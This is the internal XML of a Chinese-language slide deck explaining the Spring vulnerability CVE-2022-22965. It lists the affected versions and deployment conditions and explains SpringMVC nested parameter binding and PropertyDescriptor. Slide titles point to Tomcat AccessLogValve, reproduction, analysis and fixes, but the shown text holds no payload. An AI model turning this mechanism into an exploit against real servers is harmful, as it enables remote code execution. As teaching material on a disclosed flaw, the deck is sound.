              <a:gd name="T34" fmla="*/ 608171 w 528"/>
              <a:gd name="T35" fmla="*/ 279087 h 471"/>
              <a:gd name="T36" fmla="*/ 557490 w 528"/>
              <a:gd name="T37" fmla="*/ 228344 h 471"/>
              <a:gd name="T38" fmla="*/ 506809 w 528"/>
              <a:gd name="T39" fmla="*/ 279087 h 471"/>
              <a:gd name="T40" fmla="*/ 557490 w 528"/>
              <a:gd name="T41" fmla="*/ 329830 h 471"/>
              <a:gd name="T42" fmla="*/ 593389 w 528"/>
              <a:gd name="T43" fmla="*/ 317145 h 471"/>
              <a:gd name="T44" fmla="*/ 808783 w 528"/>
              <a:gd name="T45" fmla="*/ 437660 h 471"/>
              <a:gd name="T46" fmla="*/ 832011 w 528"/>
              <a:gd name="T47" fmla="*/ 416517 h 471"/>
              <a:gd name="T48" fmla="*/ 1114980 w 528"/>
              <a:gd name="T49" fmla="*/ 279087 h 471"/>
              <a:gd name="T50" fmla="*/ 549043 w 528"/>
              <a:gd name="T51" fmla="*/ 0 h 471"/>
              <a:gd name="T52" fmla="*/ 0 w 528"/>
              <a:gd name="T53" fmla="*/ 266401 h 471"/>
              <a:gd name="T54" fmla="*/ 0 w 528"/>
              <a:gd name="T55" fmla="*/ 289659 h 471"/>
              <a:gd name="T56" fmla="*/ 549043 w 528"/>
              <a:gd name="T57" fmla="*/ 556060 h 471"/>
              <a:gd name="T58" fmla="*/ 783442 w 528"/>
              <a:gd name="T59" fmla="*/ 441888 h 471"/>
              <a:gd name="T60" fmla="*/ 783442 w 528"/>
              <a:gd name="T61" fmla="*/ 433431 h 471"/>
              <a:gd name="T62" fmla="*/ 593389 w 528"/>
              <a:gd name="T63" fmla="*/ 334059 h 471"/>
              <a:gd name="T64" fmla="*/ 557490 w 528"/>
              <a:gd name="T65" fmla="*/ 344630 h 471"/>
              <a:gd name="T66" fmla="*/ 492027 w 528"/>
              <a:gd name="T67" fmla="*/ 279087 h 471"/>
              <a:gd name="T68" fmla="*/ 557490 w 528"/>
              <a:gd name="T69" fmla="*/ 211430 h 471"/>
              <a:gd name="T70" fmla="*/ 622953 w 528"/>
              <a:gd name="T71" fmla="*/ 279087 h 471"/>
              <a:gd name="T72" fmla="*/ 622953 w 528"/>
              <a:gd name="T73" fmla="*/ 285430 h 471"/>
              <a:gd name="T74" fmla="*/ 846793 w 528"/>
              <a:gd name="T75" fmla="*/ 410174 h 471"/>
              <a:gd name="T76" fmla="*/ 1114980 w 528"/>
              <a:gd name="T77" fmla="*/ 279087 h 471"/>
              <a:gd name="T78" fmla="*/ 832011 w 528"/>
              <a:gd name="T79" fmla="*/ 416517 h 471"/>
              <a:gd name="T80" fmla="*/ 834123 w 528"/>
              <a:gd name="T81" fmla="*/ 619489 h 471"/>
              <a:gd name="T82" fmla="*/ 853128 w 528"/>
              <a:gd name="T83" fmla="*/ 649089 h 471"/>
              <a:gd name="T84" fmla="*/ 836235 w 528"/>
              <a:gd name="T85" fmla="*/ 676575 h 471"/>
              <a:gd name="T86" fmla="*/ 851017 w 528"/>
              <a:gd name="T87" fmla="*/ 676575 h 471"/>
              <a:gd name="T88" fmla="*/ 878469 w 528"/>
              <a:gd name="T89" fmla="*/ 995834 h 471"/>
              <a:gd name="T90" fmla="*/ 768660 w 528"/>
              <a:gd name="T91" fmla="*/ 995834 h 471"/>
              <a:gd name="T92" fmla="*/ 796113 w 528"/>
              <a:gd name="T93" fmla="*/ 676575 h 471"/>
              <a:gd name="T94" fmla="*/ 810894 w 528"/>
              <a:gd name="T95" fmla="*/ 676575 h 471"/>
              <a:gd name="T96" fmla="*/ 794001 w 528"/>
              <a:gd name="T97" fmla="*/ 649089 h 471"/>
              <a:gd name="T98" fmla="*/ 810894 w 528"/>
              <a:gd name="T99" fmla="*/ 619489 h 471"/>
              <a:gd name="T100" fmla="*/ 808783 w 528"/>
              <a:gd name="T101" fmla="*/ 437660 h 471"/>
              <a:gd name="T102" fmla="*/ 832011 w 528"/>
              <a:gd name="T103" fmla="*/ 416517 h 47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28"/>
              <a:gd name="T157" fmla="*/ 0 h 471"/>
              <a:gd name="T158" fmla="*/ 528 w 528"/>
              <a:gd name="T159" fmla="*/ 471 h 47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1466510" y="2489746"/>
            <a:ext cx="9258980" cy="1106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50863" y="476250"/>
            <a:ext cx="2325687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4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1928813" y="3943577"/>
            <a:ext cx="26289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 flipV="1">
            <a:off x="8977313" y="4821238"/>
            <a:ext cx="358775" cy="2063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>
            <a:off x="7729538" y="3943577"/>
            <a:ext cx="2543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641144" y="297209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57713" y="5655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24718" y="3682499"/>
            <a:ext cx="21424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2022.04.17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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CVE-2022-22965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75310" y="1416685"/>
            <a:ext cx="11294745" cy="33229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r>
              <a:rPr sz="2000" b="1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JDK版本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：Jdk9+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800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1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Servlet容器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：Apache Tomcat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800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1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部署方式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：WAR部署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800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1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依赖项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：spring-webmvc 或 spring-webflux 依赖项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800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1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漏洞版本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：Spring Framework 版本 5.3.0 到 5.3.17、5.2.0 到 5.2.19 以及更早的版本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14763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该漏洞会影响在 JDK 9+ 上运行的 Spring MVC 和 Spring WebFlux 应用程序。具体的利用需要应用程序作为 WAR 部署在 Tomcat 上运行。如果应用程序被部署为 Spring Boot 可执行 jar，即默认值，则它不易受到漏洞利用。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SpringMVC参数绑定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339850"/>
            <a:ext cx="111213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方便编程，SpringMVC支持将HTTP请求中的的请求参数或者请求体内容，根据Controller方法的参数，自动完成类型转换和赋值。之后，Controller方法就可以直接使用这些参数，避免了需要编写大量的代码从HttpServletRequest中获取请求数据以及类型转换。下面是一个简单的示例：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2948940"/>
            <a:ext cx="8750935" cy="34671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SpringMVC参数绑定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30" y="1395095"/>
            <a:ext cx="6693535" cy="455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940" y="1395095"/>
            <a:ext cx="5165725" cy="27933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SpringMVC参数绑定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339850"/>
            <a:ext cx="111213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当请求为/addUser?name=test&amp;department.name=SEC时，public String addUser(User user)中的user参数内容如下：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945" y="2674620"/>
            <a:ext cx="9753600" cy="35623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SpringMVC参数绑定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4036695"/>
            <a:ext cx="11096625" cy="1014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SpringMVC实现参数绑定的主要类和方法是WebDataBinder.doBind(MutablePropertyValues)假设请求参数名为foo.bar.baz.qux，对应Controller方法入参为Param，则有以下的调用链：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339850"/>
            <a:ext cx="111213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</a:t>
            </a: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自动绑定到了</a:t>
            </a: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参数的</a:t>
            </a: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属性上，department.name自动绑定到了user参数的department属性的name属性上。注意department.name这项的绑定，</a:t>
            </a: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表明SpringMVC支持多层嵌套的参数绑定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。实际上department.name的绑定是Spring通过如下的调用链实现的：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557270" y="2940685"/>
            <a:ext cx="4093845" cy="1035685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User.getDepartment ( )</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Department.setName ( )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936875" y="5221605"/>
            <a:ext cx="5335270" cy="1430020"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="8F00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Param.getFoo ( )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Foo.getBar ( )</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Bar.getBaz ( )</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Baz.setQux ( ) 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7264568" cy="682623"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>Java Bean PropertyDescriptor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75310" y="5136515"/>
            <a:ext cx="1109662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800"/>
              </a:spcAft>
            </a:pP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545" y="1339850"/>
            <a:ext cx="111213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Aft>
                <a:spcPts val="1800"/>
              </a:spcAft>
            </a:pP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PropertyDescriptor</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="200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是JDK自带的java.beans包下的类，意为属性描述器，用于获取符合Java Bean规范的对象属性和get/set方法。下面是一个简单的例子：</a:t>
            </a:r>
            <a:endParaRPr sz="200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2354580"/>
            <a:ext cx="9483725" cy="43910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录"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20205357"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20205357_6*a*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5357"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom20205357_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5357"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20205357_6*l_h_f*1_1_1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_SUBTYPE" val="a"/>
  <p:tag name="KSO_WM_UNIT_SUBTYPE" val="a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5357"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20205357_6*l_h_f*1_3_1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_SUBTYPE" val="a"/>
  <p:tag name="KSO_WM_UNIT_SUBTYPE" val="a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5357"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20205357_6*l_h_f*1_4_1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_SUBTYPE" val="a"/>
  <p:tag name="KSO_WM_UNIT_SUBTYPE" val="a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UNIT_PRESET_TEXT" val="单击此处添加标题内容"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20205357"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20205357_6*l_h_f*1_5_1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_SUBTYPE" val="a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57"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20205357_6*i*1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_LINE_FORE_SCHEMECOLOR_INDEX" val="13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57"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20205357_6*i*2"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="2"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_LINE_FORE_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_LINE_FILL_TYPE" val="2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第一PPT，www.1ppt.com">
  <a:themeElements>
    <a:clrScheme name="北京大学">
      <a:dk1>
        <a:srgbClr val="333333"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="538135"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="538135"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="8F000B"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="700005"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="AC0000"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="538135"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="538135"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="538135"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="538135"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="53813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北京大学">
      <a:dk1>
        <a:srgbClr val="333333"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="538135"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="538135"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="8F000B"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="700005"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="AC0000"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="538135"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="538135"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="538135"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="538135"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="53813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8234</Words>
  <Application>WPS 文字</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>296</Paragraphs>
  <Slides>36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</vt:lpstr>
      <vt:lpstr>方正书宋_GBK</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>汉仪书宋二KW</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>汉仪旗黑</vt:lpstr>
      <vt:lpstr>华文细黑</vt:lpstr>
      <vt:lpstr>黑体-简</vt:lpstr>
      <vt:lpstr>汉仪旗黑-85S</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>苹方-简</vt:lpstr>
      <vt:lpstr>第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>1_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>CVE-2022-22965</vt:lpstr>
      <vt:lpstr>CVE-2022-22965</vt:lpstr>
      <vt:lpstr>SpringMVC参数绑定</vt:lpstr>
      <vt:lpstr>SpringMVC参数绑定</vt:lpstr>
      <vt:lpstr>SpringMVC参数绑定</vt:lpstr>
      <vt:lpstr>SpringMVC参数绑定</vt:lpstr>
      <vt:lpstr>Java Bean PropertyDescriptor</vt:lpstr>
      <vt:lpstr>Spring BeanWrapperImpl</vt:lpstr>
      <vt:lpstr>Spring BeanWrapperImpl</vt:lpstr>
      <vt:lpstr>Tomcat AccessLogValve 和 access_log</vt:lpstr>
      <vt:lpstr>漏洞复现</vt:lpstr>
      <vt:lpstr>漏洞复现</vt:lpstr>
      <vt:lpstr>漏洞复现</vt:lpstr>
      <vt:lpstr>漏洞复现</vt:lpstr>
      <vt:lpstr>漏洞分析</vt:lpstr>
      <vt:lpstr>漏洞分析</vt:lpstr>
      <vt:lpstr>漏洞分析</vt:lpstr>
      <vt:lpstr>漏洞分析</vt:lpstr>
      <vt:lpstr>漏洞分析</vt:lpstr>
      <vt:lpstr>漏洞分析</vt:lpstr>
      <vt:lpstr>漏洞分析</vt:lpstr>
      <vt:lpstr>漏洞分析</vt:lpstr>
      <vt:lpstr>漏洞分析</vt:lpstr>
      <vt:lpstr>漏洞分析</vt:lpstr>
      <vt:lpstr>漏洞分析</vt:lpstr>
      <vt:lpstr>漏洞分析</vt:lpstr>
      <vt:lpstr>漏洞分析</vt:lpstr>
      <vt:lpstr>漏洞分析</vt:lpstr>
      <vt:lpstr>漏洞修复</vt:lpstr>
      <vt:lpstr>漏洞修复</vt:lpstr>
      <vt:lpstr>漏洞修复</vt:lpstr>
      <vt:lpstr>漏洞修复</vt:lpstr>
      <vt:lpstr>漏洞防范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sgxm</cp:lastModifiedBy>
  <cp:revision>1430</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-17T06:50:47Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-17T06:50:47Z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